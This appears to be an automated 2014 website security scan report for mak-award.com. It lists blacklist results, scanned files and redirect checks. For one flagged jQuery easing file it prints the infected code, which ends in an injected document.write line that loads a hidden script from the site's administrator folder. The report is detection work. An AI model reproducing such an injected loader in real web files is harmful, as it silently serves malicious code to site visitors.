Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mak-award.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mak-award.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mak-award.com/ | 200 OK Content-Length: 15275 Content-Type: text/html | clean |
http://mak-award.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://mak-award.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://mak-award.com/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://mak-award.com/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94412 Content-Type: application/javascript | clean |
http://mak-award.com/cache/widgetkit/widgetkit-a2bd62e1.js | 200 OK Content-Length: 19977 Content-Type: application/javascript | clean |
http://mak-award.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://mak-award.com/templates/atomic/js/jquery-1.7.2.js | 200 OK Content-Length: 256030 Content-Type: application/javascript | clean |
http://mak-award.com/templates/atomic/js/template.js | 200 OK Content-Length: 1290 Content-Type: application/javascript | clean |
http://mak-award.com/templates/atomic/js/jquery.easing.1.3.js | 200 OK Content-Length: 8180 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); document.write("<scr"+"ipt src='/administrator/help/en-GB/hilo.js'><"+"/script>"); Antivirus reports:
| ||
http://mak-award.com/templates/atomic/js/jquery.fancybox-1.2.1.pack.js | 200 OK Content-Length: 8303 Content-Type: application/javascript | clean |
http://mak-award.com/about | 200 OK Content-Length: 49344 Content-Type: text/html | clean |
http://mak-award.com/partners | 200 OK Content-Length: 25501 Content-Type: text/html | clean |
http://mak-award.com/experts | 200 OK Content-Length: 16651 Content-Type: text/html | clean |
http://mak-award.com/tender | 200 OK Content-Length: 16595 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mak-award.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0
Connection: close
Date: Tue, 03 Jun 2014 03:53:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Tue, 03 Jun 2014 03:53:11 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ada336cbe1e391e0f5c3d525aae6096e=19f21rv8ua2pasb6md288u4uf3; path=/
GET / HTTP/1.1
Host: mak-award.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0
Connection: close
Date: Tue, 03 Jun 2014 03:53:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Tue, 03 Jun 2014 03:53:11 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ada336cbe1e391e0f5c3d525aae6096e=19f21rv8ua2pasb6md288u4uf3; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: mak-award.com
Referer: http://www.google.com/search?q=mak-award.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mak-award.com
Referer: http://www.google.com/search?q=mak-award.com
Result:
The result is similar to the first query. There are no suspicious redirects found.